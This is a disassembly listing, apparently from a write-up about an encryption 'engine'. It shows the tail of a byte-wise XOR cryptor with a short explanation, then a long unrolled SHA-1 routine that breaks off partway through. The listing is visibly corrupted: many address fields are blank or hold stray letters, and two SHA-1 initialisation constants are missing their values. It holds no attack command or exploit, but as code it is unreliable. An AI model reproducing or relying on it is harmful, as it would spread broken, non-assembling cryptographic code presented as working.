CODE:00401DD7
CODE:00401DD8
CODE:00401DD8 crypt_loop:
CODE:00401DD8 test dl, dl
CODE:00401DDA jz short dont_crypt
CODE:00401DDA
CODE:00401DDC xor [ebx], dl
CODE:00401DDE inc ebx
CODE:00401DDE
CODE:00401DDF
CODE:00401DDF dont_crypt:
CODE:00401DDF rol edx, 8
CODE:00401DE2 loop crypt_loop
CODE:00401DE2
CODE:00401DE4 popa
CODE:00401DE5 retn
CODE:00401DE5
CODE:00401DE5 cryptor endp

The previous code block is the 32-bit encryptor and decryptor of the engine. The key in EDX is applied byte by byte for ECX iterations: the byte at [ebx] is XORed with DL, EBX is advanced, and EDX is rotated left by 8 so the next key byte moves into DL. A zero key byte is skipped without advancing EBX, so a key containing zero bytes leaves the last bytes of the buffer untouched. Because XOR is its own inverse, the same routine serves both directions.

CODE:00401DF0 SHA1 proc near
CODE:00401DF0
CODE:00401DF0
CODE:00401DF0 _temp_buffer = dword ptr -4E0h
CODE:00401DF0 var_4dc = dword ptr -4DCh
CODE:00401DF0 var_4d8 = dword ptr -4D8h
CODE:00401DF0 var_4d4 = dword ptr -4D4h
CODE:00401DF0 var_4d0 = dword ptr -4D0h
CODE:00401DF0 var_4cc = dword ptr -4CCh
CODE:00401DF0 var_4c8 = dword ptr -4C8h
CODE:00401DF0 var_4c4 = dword ptr -4C4h
CODE:00401DF0 var_4c0 = dword ptr -4C0h
CODE:00401DF0 var_4bc = dword ptr -4BCh
CODE:00401DF0 var_4b8 = dword ptr -4B8h
CODE:00401DF0 var_4b4 = dword ptr -4B4h
CODE:00401DF0 var_4b0 = dword ptr -4B0h
CODE:00401DF0 var_4ac = dword ptr -4ACh
CODE:00401DF0 var_4a8 = dword ptr -4A8h
CODE:00401DF0 var_4a4 = dword ptr -4A4h
CODE:00401DF0 var_2e0 = dword ptr -2E0h
CODE:00401DF0 var_2dc = dword ptr -2DCh
CODE:00401DF0 var_2d8 = dword ptr -2D8h
CODE:00401DF0 var_2d4 = dword ptr -2D4h
CODE:00401DF0 var_2d0 = dword ptr -2D0h
CODE:00401DF0 var_2cc = dword ptr -2CCh
CODE:00401DF0 _size = dword ptr -28Ch
CODE:00401DF0 _count = dword ptr -288h
CODE:00401DF0 _flag = dword ptr -284h
CODE:00401DF0 arg_0 = dword ptr 4
CODE:00401DF0 arg_4 = dword ptr 8
CODE:00401DF0 arg_8 = dword ptr 0Ch
CODE:00401DF0
CODE:00401DF0 pusha
CODE:00401DF1 sub esp, 260h
CODE:00401DF7 cld
CODE:00401DF8 mov ecx, [esp+280h+arg_4]
CODE:00401DFF mov esi, [esp+280h+arg_8]
CODE:00401E06 mov [esp+280h+_size], ecx
CODE:00401E0A or [esp+280h+_flag], 0FFFFFFFFh
CODE:00401E0F mov [esp+280h+_count], ecx
CODE:00401E13 mov [esp+280h+var_2dc], h
CODE:00401E1B mov [esp+280h+var_2d8], 0EFCDAB89h
CODE:00401E23 mov [esp+280h+var_2d4], 98BADCFEh
CODE:00401E2B mov [esp+280h+var_2d0], h
CODE:00401E33 mov [esp+280h+var_2cc], 0C3D2E1F0h
CODE:00401E33
CODE:00401E3B
CODE:00401E3B SHA1_Loop:
CODE:00401E3B
CODE:00401E3B cmp [esp+280h+_count], 40h
CODE:00401E40 jb SHA1_LIPOF
CODE:00401E40
CODE:00401E46 mov edi, [esp+280h+var_2dc]
CODE:00401E4A mov ebx, [esp+280h+var_2d8]
CODE:00401E4E mov ecx, [esp+280h+var_2d4]
CODE:00401E52 mov edx, [esp+280h+var_2d0]
CODE:00401E56 mov ebp, [esp+280h+var_2cc]
CODE:00401E5A mov [esp+280h+var_2e0], edi
CODE:00401E5E lodsd
CODE:00401E5F rol [esp+280h+var_2e0], 5
CODE:00401E64 bswap eax
CODE:00401E66 add ebp, [esp+280h+var_2e0]
CODE:00401E6A mov [esp+280h+_temp_buffer], eax
CODE:00401E71 mov [esp+280h+var_2e0], ecx
CODE:00401E75 xor [esp+280h+var_2e0], edx
CODE:00401E79 add ebp, eax
CODE:00401E7B and [esp+280h+var_2e0], ebx
CODE:00401E7F xor [esp+280h+var_2e0], edx
CODE:00401E83 ror ebx, 2
CODE:00401E86 lea ebp, [ebp+5a827999h]
CODE:00401E8C add ebp, [esp+280h+var_2e0]
CODE:00401E90 mov [esp+280h+var_2e0], ebp
CODE:00401E94 lodsd
CODE:00401E95 rol [esp+280h+var_2e0], 5
CODE:00401E9A bswap eax
CODE:00401E9C add edx, [esp+280h+var_2e0]
CODE:00401EA0 mov [esp+280h+var_4dc], eax
CODE:00401EA7 mov [esp+280h+var_2e0], ebx
CODE:00401EAB xor [esp+280h+var_2e0], ecx
CODE:00401EAF add edx, eax
CODE:00401EB1 and [esp+280h+var_2e0], edi
CODE:00401EB5 xor [esp+280h+var_2e0], ecx
CODE:00401EB9 ror edi, 2
CODE:00401EBC lea edx, [edx+5a827999h]
CODE:00401EC2 add edx, [esp+280h+var_2e0]
CODE:00401EC6 mov [esp+280h+var_2e0], edx
CODE:00401ECA lodsd
CODE:00401ECB rol [esp+280h+var_2e0], 5
CODE:00401ED0 bswap eax
CODE:00401ED2 add ecx, [esp+280h+var_2e0]
CODE:00401ED6 mov [esp+280h+var_4d8], eax
CODE:00401EDD mov [esp+280h+var_2e0], edi
CODE:00401EE1 xor [esp+280h+var_2e0], ebx
CODE:00401EE5 add ecx, eax
CODE:00401EE7 and [esp+280h+var_2e0], ebp
CODE:00401EEB xor [esp+280h+var_2e0], ebx
CODE:00401EEF ror ebp, 2
CODE:00401EF2 lea ecx, [ecx+5a827999h]
CODE:00401EF8 add ecx, [esp+280h+var_2e0]
CODE:00401EFC mov [esp+280h+var_2e0], ecx
CODE:00401F00 lodsd
CODE:00401F01 rol [esp+280h+var_2e0], 5
CODE:00401F06 bswap eax
CODE:00401F08 add ebx, [esp+280h+var_2e0]
CODE:00401F0C mov [esp+280h+var_4d4], eax
CODE:00401F13 mov [esp+280h+var_2e0], ebp
CODE:00401F17 xor [esp+280h+var_2e0], edi
CODE:00401F1B add ebx, eax
CODE:00401F1D and [esp+280h+var_2e0], edx
CODE:00401F21 xor [esp+280h+var_2e0], edi
CODE:00401F25 ror edx, 2
CODE:00401F28 lea ebx, [ebx+5a827999h]
CODE:00401F2E add ebx, [esp+280h+var_2e0]
CODE:00401F32 mov [esp+280h+var_2e0], ebx
CODE:00401F36 lodsd
CODE:00401F37 rol [esp+280h+var_2e0], 5
CODE:00401F3C bswap eax
CODE:00401F3E add edi, [esp+280h+var_2e0]
CODE:00401F42 mov [esp+280h+var_4d0], eax
CODE:00401F49 mov [esp+280h+var_2e0], edx
CODE:00401F4D xor [esp+280h+var_2e0], ebp
CODE:00401F51 add edi, eax
CODE:00401F53 and [esp+280h+var_2e0], ecx
CODE:00401F57 xor [esp+280h+var_2e0], ebp
CODE:00401F5B ror ecx, 2
CODE:00401F5E lea edi, [edi+5a827999h]
CODE:00401F64 add edi, [esp+280h+var_2e0]
CODE:00401F68 mov [esp+280h+var_2e0], edi
CODE:00401F6C lodsd
CODE:00401F6D rol [esp+280h+var_2e0], 5
CODE:00401F72 bswap eax
CODE:00401F74 add ebp, [esp+280h+var_2e0]
CODE:00401F78 mov [esp+280h+var_4cc], eax
CODE:00401F7F mov [esp+280h+var_2e0], ecx
CODE:00401F83 xor [esp+280h+var_2e0], edx
CODE:00401F87 add ebp, eax
CODE:00401F89 and [esp+280h+var_2e0], ebx
CODE:00401F8D xor [esp+280h+var_2e0], edx
CODE:00401F91 ror ebx, 2
CODE:00401F94 lea ebp, [ebp+5a827999h]
CODE:00401F9A add ebp, [esp+280h+var_2e0]
CODE:00401F9E mov [esp+280h+var_2e0], ebp
CODE:00401FA2 lodsd
CODE:00401FA3 rol [esp+280h+var_2e0], 5
CODE:00401FA8 bswap eax
CODE:00401FAA add edx, [esp+280h+var_2e0]
CODE:00401FAE mov [esp+280h+var_4c8], eax
CODE:00401FB5 mov [esp+280h+var_2e0], ebx
CODE:00401FB9 xor [esp+280h+var_2e0], ecx
CODE:00401FBD add edx, eax
CODE:00401FBF and [esp+280h+var_2e0], edi
CODE:00401FC3 xor [esp+280h+var_2e0], ecx
CODE:00401FC7 ror edi, 2
CODE:00401FCA lea edx, [edx+5a827999h]
CODE:00401FD0 add edx, [esp+280h+var_2e0]
CODE:00401FD4 mov [esp+280h+var_2e0], edx
CODE:00401FD8 lodsd
CODE:00401FD9 rol [esp+280h+var_2e0], 5
CODE:00401FDE bswap eax
CODE:00401FE0 add ecx, [esp+280h+var_2e0]
CODE:00401FE4 mov [esp+280h+var_4c4], eax
CODE:00401FEB mov [esp+280h+var_2e0], edi
CODE:00401FEF xor [esp+280h+var_2e0], ebx
CODE:00401FF3 add ecx, eax
CODE:00401FF5 and [esp+280h+var_2e0], ebp
CODE:00401FF9 xor [esp+280h+var_2e0], ebx
CODE:00401FFD ror ebp, 2
CODE: lea ecx, [ecx+5a827999h]
CODE: add ecx, [esp+280h+var_2e0]
CODE: A mov [esp+280h+var_2e0], ecx
CODE: E lodsd
CODE: F rol [esp+280h+var_2e0], 5
CODE: bswap eax
CODE: add ebx, [esp+280h+var_2e0]
CODE: A mov [esp+280h+var_4c0], eax
CODE: mov [esp+280h+var_2e0], ebp
CODE: xor [esp+280h+var_2e0], edi
CODE: add ebx, eax
CODE: B and [esp+280h+var_2e0], edx
CODE: F xor [esp+280h+var_2e0], edi
CODE: ror edx, 2
CODE: lea ebx, [ebx+5a827999h]
CODE: C add ebx, [esp+280h+var_2e0]
CODE: mov [esp+280h+var_2e0], ebx
CODE: lodsd
CODE: rol [esp+280h+var_2e0], 5
CODE: A bswap eax
CODE: C add edi, [esp+280h+var_2e0]
CODE: mov [esp+280h+var_4bc], eax
CODE: mov [esp+280h+var_2e0], edx
CODE: B xor [esp+280h+var_2e0], ebp
CODE: F add edi, eax
CODE: and [esp+280h+var_2e0], ecx
CODE: xor [esp+280h+var_2e0], ebp
CODE: ror ecx, 2
CODE: C lea edi, [edi+5a827999h]
CODE: add edi, [esp+280h+var_2e0]
CODE: mov [esp+280h+var_2e0], edi
CODE: A lodsd
CODE: B rol [esp+280h+var_2e0], 5
CODE: bswap eax
CODE: add ebp, [esp+280h+var_2e0]
CODE: mov [esp+280h+var_4b8], eax
CODE: D mov [esp+280h+var_2e0], ecx
CODE: xor [esp+280h+var_2e0], edx
CODE: add ebp, eax
CODE: and [esp+280h+var_2e0], ebx
CODE: B xor [esp+280h+var_2e0], edx
CODE: F ror ebx, 2
CODE:004020A2 lea ebp, [ebp+5a827999h]
CODE:004020A8 add ebp, [esp+280h+var_2e0]
CODE:004020AC mov [esp+280h+var_2e0], ebp
CODE:004020B0 lodsd
CODE:004020B1 rol [esp+280h+var_2e0], 5
CODE:004020B6 bswap eax
CODE:004020B8 add edx, [esp+280h+var_2e0]
CODE:004020BC mov [esp+280h+var_4b4], eax
CODE:004020C3 mov [esp+280h+var_2e0], ebx
CODE:004020C7 xor [esp+280h+var_2e0], ecx
CODE:004020CB add edx, eax
CODE:004020CD and [esp+280h+var_2e0], edi
CODE:004020D1 xor [esp+280h+var_2e0], ecx
CODE:004020D5 ror edi, 2
CODE:004020D8 lea edx, [edx+5a827999h]
CODE:004020DE add edx, [esp+280h+var_2e0]
CODE:004020E2 mov [esp+280h+var_2e0], edx
CODE:004020E6 lodsd
CODE:004020E7 rol [esp+280h+var_2e0], 5
CODE:004020EC bswap eax
CODE:004020EE add ecx, [esp+280h+var_2e0]
CODE:004020F2 mov [esp+280h+var_4b0], eax
CODE:004020F9 mov [esp+280h+var_2e0], edi
CODE:004020FD xor [esp+280h+var_2e0], ebx
CODE: add ecx, eax
CODE: and [esp+280h+var_2e0], ebp
CODE: xor [esp+280h+var_2e0], ebx
CODE: B ror ebp, 2
CODE: E lea ecx, [ecx+5a827999h]
CODE: add ecx, [esp+280h+var_2e0]
CODE: mov [esp+280h+var_2e0], ecx
CODE: C lodsd
CODE: D rol [esp+280h+var_2e0], 5
CODE: bswap eax
CODE: add ebx, [esp+280h+var_2e0]
CODE: mov [esp+280h+var_4ac], eax
CODE: F mov [esp+280h+var_2e0], ebp
CODE: xor [esp+280h+var_2e0], edi
CODE: add ebx, eax
CODE: and [esp+280h+var_2e0], edx
CODE: D xor [esp+280h+var_2e0], edi
CODE: ror edx, 2
CODE: lea ebx, [ebx+5a827999h]
CODE: A add ebx, [esp+280h+var_2e0]
CODE: E mov [esp+280h+var_2e0], ebx
CODE: lodsd
CODE: rol [esp+280h+var_2e0], 5
CODE: bswap eax
CODE: A add edi, [esp+280h+var_2e0]
CODE: E mov [esp+280h+var_4a8], eax
CODE: mov [esp+280h+var_2e0], edx
CODE: xor [esp+280h+var_2e0], ebp
CODE: D add edi, eax
CODE: F and [esp+280h+var_2e0], ecx
CODE: xor [esp+280h+var_2e0], ebp
CODE: ror ecx, 2
CODE: A lea edi, [edi+5a827999h]
CODE: add edi, [esp+280h+var_2e0]
CODE: mov [esp+280h+var_2e0], edi
CODE: lodsd
CODE: rol [esp+280h+var_2e0], 5
CODE: E bswap eax
CODE: add ebp, [esp+280h+var_2e0]
CODE: mov [esp+280h+var_4a4], eax
CODE: B mov [esp+280h+var_2e0], ecx
CODE: F xor [esp+280h+var_2e0], edx
CODE:004021A3 add ebp, eax
CODE:004021A5 and [esp+280h+var_2e0], ebx
CODE:004021A9 xor [esp+280h+var_2e0], edx
CODE:004021AD ror ebx, 2
CODE:004021B0 lea ebp, [ebp+5a827999h]
CODE:004021B6 add ebp, [esp+280h+var_2e0]
CODE:004021BA mov [esp+280h+var_2e0], ebp
CODE:004021BE mov eax, [esp+280h+var_4ac]
CODE:004021C5 rol [esp+280h+var_2e0], 5
CODE:004021CA xor eax, [esp+280h+var_4c0]
CODE:004021D1 add edx, [esp+280h+var_2e0]
CODE:004021D5 xor eax, [esp+280h+var_4d8]
CODE:004021DC mov [esp+280h+var_2e0], ebx
CODE:004021E0 xor eax, [esp+280h+_temp_buffer]
CODE:004021E7 xor [esp+280h+var_2e0], ecx
CODE:004021EB rol eax, 1
CODE:004021ED and [esp+280h+var_2e0], edi
CODE:004021F1 mov [esp+280h+_temp_buffer], eax
CODE:004021F8 xor [esp+280h+var_2e0], ecx
CODE:004021FC add edx, eax
CODE:004021FE ror edi, 2
CODE: lea edx, [edx+5a827999h]
CODE: add edx, [esp+280h+var_2e0]
CODE: B mov [esp+280h+var_2e0], edx
CODE: F mov eax, [esp+280h+var_4a8]
CODE: rol [esp+280h+var_2e0], 5
CODE: B xor eax, [esp+280h+var_4bc]
CODE: add ecx, [esp+280h+var_2e0]
CODE: xor eax, [esp+280h+var_4d4]
CODE: D mov [esp+280h+var_2e0], edi
CODE: xor eax, [esp+280h+var_4dc]
CODE: xor [esp+280h+var_2e0], ebx
CODE: C rol eax, 1
CODE: E and [esp+280h+var_2e0], ebp
CODE: mov [esp+280h+var_4dc], eax
CODE: xor [esp+280h+var_2e0], ebx
CODE: D add ecx, eax
CODE: F ror ebp, 2
CODE: lea ecx, [ecx+5a827999h]
CODE: add ecx, [esp+280h+var_2e0]
CODE: C mov [esp+280h+var_2e0], ecx
CODE: mov eax, [esp+280h+var_4a4]
CODE: rol [esp+280h+var_2e0], 5
CODE: C xor eax, [esp+280h+var_4b8]
CODE: add ebx, [esp+280h+var_2e0]
CODE: xor eax, [esp+280h+var_4d0]
CODE: E mov [esp+280h+var_2e0], ebp
CODE: xor eax, [esp+280h+var_4d8]
CODE: xor [esp+280h+var_2e0], edi
CODE: D rol eax, 1
CODE: F and [esp+280h+var_2e0], edx
CODE: mov [esp+280h+var_4d8], eax
CODE: A xor [esp+280h+var_2e0], edi
CODE: E add ebx, eax
CODE:004022A0 ror edx, 2
CODE:004022A3 lea ebx, [ebx+5a827999h]
CODE:004022A9 add ebx, [esp+280h+var_2e0]
CODE:004022AD mov [esp+280h+var_2e0], ebx
CODE:004022B1 mov eax, [esp+280h+_temp_buffer]
CODE:004022B8 rol [esp+280h+var_2e0], 5
CODE:004022BD xor eax, [esp+280h+var_4b4]
CODE:004022C4 add edi, [esp+280h+var_2e0]
CODE:004022C8 xor eax, [esp+280h+var_4cc]
CODE:004022CF mov [esp+280h+var_2e0], edx
CODE:004022D3 xor eax, [esp+280h+var_4d4]
CODE:004022DA xor [esp+280h+var_2e0], ebp
CODE:004022DE rol eax, 1
CODE:004022E0 and [esp+280h+var_2e0], ecx
CODE:004022E4 mov [esp+280h+var_4d4], eax
CODE:004022EB xor [esp+280h+var_2e0], ebp
CODE:004022EF add edi, eax
CODE:004022F1 ror ecx, 2
CODE:004022F4 lea edi, [edi+5a827999h]
CODE:004022FA add edi, [esp+280h+var_2e0]
CODE:004022FE mov [esp+280h+var_2e0], edi
CODE: mov eax, [esp+280h+var_4dc]
CODE: rol [esp+280h+var_2e0], 5
CODE: E xor eax, [esp+280h+var_4b0]
CODE: add ebp, [esp+280h+var_2e0]
CODE: xor eax, [esp+280h+var_4c8]
CODE: mov [esp+280h+var_2e0], ebx
CODE: xor eax, [esp+280h+var_4d0]
CODE: B xor [esp+280h+var_2e0], ecx
CODE: F rol eax, 1
CODE: xor [esp+280h+var_2e0], edx
CODE: mov [esp+280h+var_4d0], eax
CODE: C add ebp, [esp+280h+var_2e0]
CODE: ror ebx, 2
CODE: lea ebp, [ebp+eax+6ed9eba1h]
CODE: A mov [esp+280h+var_2e0], ebp
CODE: E mov eax, [esp+280h+var_4d8]
CODE: rol [esp+280h+var_2e0], 5
CODE: A xor eax, [esp+280h+var_4ac]
CODE: add edx, [esp+280h+var_2e0]
CODE: xor eax, [esp+280h+var_4c4]
CODE: C mov [esp+280h+var_2e0], edi
CODE: xor eax, [esp+280h+var_4cc]
CODE: xor [esp+280h+var_2e0], ebx
CODE: B rol eax, 1
CODE: D xor [esp+280h+var_2e0], ecx
CODE: mov [esp+280h+var_4cc], eax
CODE: add edx, [esp+280h+var_2e0]
CODE: C ror edi, 2
CODE: F lea edx, [edx+eax+6ed9eba1h]
CODE: mov [esp+280h+var_2e0], edx
CODE: A mov eax, [esp+280h+var_4d4]
CODE:004023A1 rol [esp+280h+var_2e0], 5
CODE:004023A6 xor eax, [esp+280h+var_4a8]
CODE:004023AD add ecx, [esp+280h+var_2e0]
CODE:004023B1 xor eax, [esp+280h+var_4c0]
CODE:004023B8 mov [esp+280h+var_2e0], ebp
CODE:004023BC xor eax, [esp+280h+var_4c8]
CODE:004023C3 xor [esp+280h+var_2e0], edi
CODE:004023C7 rol eax, 1
CODE:004023C9 xor [esp+280h+var_2e0], ebx
CODE:004023CD mov [esp+280h+var_4c8], eax
CODE:004023D4 add ecx, [esp+280h+var_2e0]
CODE:004023D8 ror ebp, 2
CODE:004023DB lea ecx, [ecx+eax+6ed9eba1h]
CODE:004023E2 mov [esp+280h+var_2e0], ecx
CODE:004023E6 mov eax, [esp+280h+var_4d0]
CODE:004023ED rol [esp+280h+var_2e0], 5
CODE:004023F2 xor eax, [esp+280h+var_4a4]
CODE:004023F9 add ebx, [esp+280h+var_2e0]
CODE:004023FD xor eax, [esp+280h+var_4bc]
CODE: mov [esp+280h+var_2e0], edx
CODE: xor eax, [esp+280h+var_4c4]
CODE: F xor [esp+280h+var_2e0], ebp
CODE: rol eax, 1
CODE: xor [esp+280h+var_2e0], edi
CODE: mov [esp+280h+var_4c4], eax
CODE: add ebx, [esp+280h+var_2e0]
CODE: ror edx, 2
CODE: lea ebx, [ebx+eax+6ed9eba1h]
CODE: E mov [esp+280h+var_2e0], ebx
CODE: mov eax, [esp+280h+var_4cc]
CODE: rol [esp+280h+var_2e0], 5
CODE: E xor eax, [esp+280h+_temp_buffer]
CODE: add edi, [esp+280h+var_2e0]
CODE: xor eax, [esp+280h+var_4b8]
CODE: mov [esp+280h+var_2e0], ecx
CODE: xor eax, [esp+280h+var_4c0]
CODE: B xor [esp+280h+var_2e0], edx
CODE: F rol eax, 1
CODE: xor [esp+280h+var_2e0], ebp
CODE: mov [esp+280h+var_4c0], eax
CODE: C add edi, [esp+280h+var_2e0]
CODE: ror ecx, 2
CODE: lea edi, [edi+eax+6ed9eba1h]
CODE: A mov [esp+280h+var_2e0], edi
CODE: E mov eax, [esp+280h+var_4c8]
CODE: rol [esp+280h+var_2e0], 5
CODE: A xor eax, [esp+280h+var_4dc]
CODE: add ebp, [esp+280h+var_2e0]
CODE: xor eax, [esp+280h+var_4b4]
CODE: C mov [esp+280h+var_2e0], ebx
CODE:004024A0 xor eax, [esp+280h+var_4bc]
CODE:004024A7 xor [esp+280h+var_2e0], ecx
CODE:004024AB rol eax, 1
CODE:004024AD xor [esp+280h+var_2e0], edx
CODE:004024B1 mov [esp+280h+var_4bc], eax
CODE:004024B8 add ebp, [esp+280h+var_2e0]
CODE:004024BC ror ebx, 2
CODE:004024BF lea ebp, [ebp+eax+6ed9eba1h]
CODE:004024C6 mov [esp+280h+var_2e0], ebp
CODE:004024CA mov eax, [esp+280h+var_4c4]
CODE:004024D1 rol [esp+280h+var_2e0], 5
CODE:004024D6 xor eax, [esp+280h+var_4d8]
CODE:004024DD add edx, [esp+280h+var_2e0]
CODE:004024E1 xor eax, [esp+280h+var_4b0]
CODE:004024E8 mov [esp+280h+var_2e0], edi
CODE:004024EC xor eax, [esp+280h+var_4b8]
CODE:004024F3 xor [esp+280h+var_2e0], ebx
CODE:004024F7 rol eax, 1
CODE:004024F9 xor [esp+280h+var_2e0], ecx
CODE:004024FD mov [esp+280h+var_4b8], eax
CODE: add edx, [esp+280h+var_2e0]
CODE: ror edi, 2
CODE: B lea edx, [edx+eax+6ed9eba1h]
CODE: mov [esp+280h+var_2e0], edx
CODE: mov eax, [esp+280h+var_4c0]
CODE: D rol [esp+280h+var_2e0], 5
CODE: xor eax, [esp+280h+var_4d4]
CODE: add ecx, [esp+280h+var_2e0]
CODE: D xor eax, [esp+280h+var_4ac]
CODE: mov [esp+280h+var_2e0], ebp
CODE: xor eax, [esp+280h+var_4b4]
CODE: F xor [esp+280h+var_2e0], edi
CODE: rol eax, 1
CODE: xor [esp+280h+var_2e0], ebx
CODE: mov [esp+280h+var_4b4], eax
CODE: add ecx, [esp+280h+var_2e0]
CODE: ror ebp, 2
CODE: lea ecx, [ecx+eax+6ed9eba1h]
CODE: E mov [esp+280h+var_2e0], ecx
CODE: mov eax, [esp+280h+var_4bc]
CODE: rol [esp+280h+var_2e0], 5
CODE: E xor eax, [esp+280h+var_4d0]
CODE: add ebx, [esp+280h+var_2e0]
CODE: xor eax, [esp+280h+var_4a8]
CODE: mov [esp+280h+var_2e0], edx
CODE: xor eax, [esp+280h+var_4b0]
CODE: B xor [esp+280h+var_2e0], ebp
CODE: F rol eax, 1
CODE: xor [esp+280h+var_2e0], edi
CODE: mov [esp+280h+var_4b0], eax
CODE: C add ebx, [esp+280h+var_2e0]
CODE:004025A0 ror edx, 2
CODE:004025A3 lea ebx, [ebx+eax+6ed9eba1h]
CODE:004025AA mov [esp+280h+var_2e0], ebx
CODE:004025AE mov eax, [esp+280h+var_4b8]
CODE:004025B5 rol [esp+280h+var_2e0], 5
CODE:004025BA xor eax, [esp+280h+var_4cc]
CODE:004025C1 add edi, [esp+280h+var_2e0]
CODE:004025C5 xor eax, [esp+280h+var_4a4]
CODE:004025CC mov [esp+280h+var_2e0], ecx
CODE:004025D0 xor eax, [esp+280h+var_4ac]
CODE:004025D7 xor [esp+280h+var_2e0], edx
CODE:004025DB rol eax, 1
CODE:004025DD xor [esp+280h+var_2e0], ebp
CODE:004025E1 mov [esp+280h+var_4ac], eax
CODE:004025E8 add edi, [esp+280h+var_2e0]
CODE:004025EC ror ecx, 2
CODE:004025EF lea edi, [edi+eax+6ed9eba1h]
CODE:004025F6 mov [esp+280h+var_2e0], edi
CODE:004025FA mov eax, [esp+280h+var_4b4]
CODE: rol [esp+280h+var_2e0], 5
CODE: xor eax, [esp+280h+var_4c8]
CODE: D add ebp, [esp+280h+var_2e0]
CODE: xor eax, [esp+280h+_temp_buffer]
CODE: mov [esp+280h+var_2e0], ebx
CODE: C xor eax, [esp+280h+var_4a8]
CODE: xor [esp+280h+var_2e0], ecx
CODE: rol eax, 1
CODE: xor [esp+280h+var_2e0], edx
CODE: D mov [esp+280h+var_4a8], eax
CODE: add ebp, [esp+280h+var_2e0]
CODE: ror ebx, 2
CODE: B lea ebp, [ebp+eax+6ed9eba1h]
CODE: mov [esp+280h+var_2e0], ebp
CODE: mov eax, [esp+280h+var_4b0]
CODE: D rol [esp+280h+var_2e0], 5
CODE: xor eax, [esp+280h+var_4c4]
CODE: add edx, [esp+280h+var_2e0]
CODE: D xor eax, [esp+280h+var_4dc]
CODE: mov [esp+280h+var_2e0], edi
CODE: xor eax, [esp+280h+var_4a4]
CODE: F xor [esp+280h+var_2e0], ebx
CODE: rol eax, 1
CODE: xor [esp+280h+var_2e0], ecx
CODE: mov [esp+280h+var_4a4], eax
CODE: add edx, [esp+280h+var_2e0]
CODE: ror edi, 2
CODE: lea edx, [edx+eax+6ed9eba1h]
CODE: E mov [esp+280h+var_2e0], edx
CODE: mov eax, [esp+280h+var_4ac]
CODE: rol [esp+280h+var_2e0], 5
CODE: E xor eax, [esp+280h+var_4c0]
CODE:004026A5 add ecx, [esp+280h+var_2e0]
CODE:004026A9 xor eax, [esp+280h+var_4d8]
CODE:004026B0 mov [esp+280h+var_2e0], ebp
CODE:004026B4 xor eax, [esp+280h+_temp_buffer]
CODE:004026BB xor [esp+280h+var_2e0], edi
CODE:004026BF rol eax, 1
CODE:004026C1 xor [esp+280h+var_2e0], ebx
CODE:004026C5 mov [esp+280h+_temp_buffer], eax
CODE:004026CC add ecx, [esp+280h+var_2e0]
CODE:004026D0 ror ebp, 2
CODE:004026D3 lea ecx, [ecx+eax+6ed9eba1h]
CODE:004026DA mov [esp+280h+var_2e0], ecx
CODE:004026DE mov eax, [esp+280h+var_4a8]
CODE:004026E5 rol [esp+280h+var_2e0], 5
CODE:004026EA xor eax, [esp+280h+var_4bc]
CODE:004026F1 add ebx, [esp+280h+var_2e0]
CODE:004026F5 xor eax, [esp+280h+var_4d4]
CODE:004026FC mov [esp+280h+var_2e0], edx
CODE: xor eax, [esp+280h+var_4dc]
CODE: xor [esp+280h+var_2e0], ebp
CODE: B rol eax, 1
CODE: D xor [esp+280h+var_2e0], edi
CODE: mov [esp+280h+var_4dc], eax
CODE: add ebx, [esp+280h+var_2e0]
CODE: C ror edx, 2
CODE: F lea ebx, [ebx+eax+6ed9eba1h]
CODE: mov [esp+280h+var_2e0], ebx
CODE: A mov eax, [esp+280h+var_4a4]
CODE: rol [esp+280h+var_2e0], 5
CODE: xor eax, [esp+280h+var_4b8]
CODE: D add edi, [esp+280h+var_2e0]
CODE: xor eax, [esp+280h+var_4d0]
CODE: mov [esp+280h+var_2e0], ecx
CODE: C xor eax, [esp+280h+var_4d8]
CODE: xor [esp+280h+var_2e0], edx
CODE: rol eax, 1
CODE: xor [esp+280h+var_2e0], ebp
CODE: D mov [esp+280h+var_4d8], eax
CODE: add edi, [esp+280h+var_2e0]
CODE: ror ecx, 2
CODE: B lea edi, [edi+eax+6ed9eba1h]
CODE: mov [esp+280h+var_2e0], edi
CODE: mov eax, [esp+280h+_temp_buffer]
CODE: D rol [esp+280h+var_2e0], 5
CODE: xor eax, [esp+280h+var_4b4]
CODE: add ebp, [esp+280h+var_2e0]
CODE: D xor eax, [esp+280h+var_4cc]
CODE: mov [esp+280h+var_2e0], ebx
CODE: xor eax, [esp+280h+var_4d4]
CODE: F xor [esp+280h+var_2e0], ecx
CODE:004027A3 rol eax, 1
CODE:004027A5 xor [esp+280h+var_2e0], edx
CODE:004027A9 mov [esp+280h+var_4d4], eax
CODE:004027B0 add ebp, [esp+280h+var_2e0]
CODE:004027B4 ror ebx, 2
CODE:004027B7 lea ebp, [ebp+eax+6ed9eba1h]
CODE:004027BE mov [esp+280h+var_2e0], ebp
CODE:004027C2 mov eax, [esp+280h+var_4dc]
CODE:004027C9 rol [esp+280h+var_2e0], 5
CODE:004027CE xor eax, [esp+280h+var_4b0]
CODE:004027D5 add edx, [esp+280h+var_2e0]
CODE:004027D9 xor eax, [esp+280h+var_4c8]
CODE:004027E0 mov [esp+280h+var_2e0], edi
CODE:004027E4 xor eax, [esp+280h+var_4d0]
CODE:004027EB xor [esp+280h+var_2e0], ebx
CODE:004027EF rol eax, 1
CODE:004027F1 xor [esp+280h+var_2e0], ecx
CODE:004027F5 mov [esp+280h+var_4d0], eax
CODE:004027FC add edx, [esp+280h+var_2e0]
CODE: ror edi, 2
CODE: lea edx, [edx+eax+6ed9eba1h]
CODE: A mov [esp+280h+var_2e0], edx
CODE: E mov eax, [esp+280h+var_4d8]
CODE: rol [esp+280h+var_2e0], 5
CODE: A xor eax, [esp+280h+var_4ac]
CODE: add ecx, [esp+280h+var_2e0]
CODE: xor eax, [esp+280h+var_4c4]
CODE: C mov [esp+280h+var_2e0], ebp
CODE: xor eax, [esp+280h+var_4cc]
CODE: xor [esp+280h+var_2e0], edi
CODE: B rol eax, 1
CODE: D xor [esp+280h+var_2e0], ebx
CODE: mov [esp+280h+var_4cc], eax
CODE: add ecx, [esp+280h+var_2e0]
CODE: C ror ebp, 2
CODE: F lea ecx, [ecx+eax+6ed9eba1h]
CODE: mov [esp+280h+var_2e0], ecx
CODE: A mov eax, [esp+280h+var_4d4]
CODE: rol [esp+280h+var_2e0], 5
CODE: xor eax, [esp+280h+var_4a8]
CODE: D add ebx, [esp+280h+var_2e0]
CODE: xor eax, [esp+280h+var_4c0]
CODE: mov [esp+280h+var_2e0], edx
CODE: C xor eax, [esp+280h+var_4c8]
CODE: xor [esp+280h+var_2e0], ebp
CODE: rol eax, 1
CODE: xor [esp+280h+var_2e0], edi
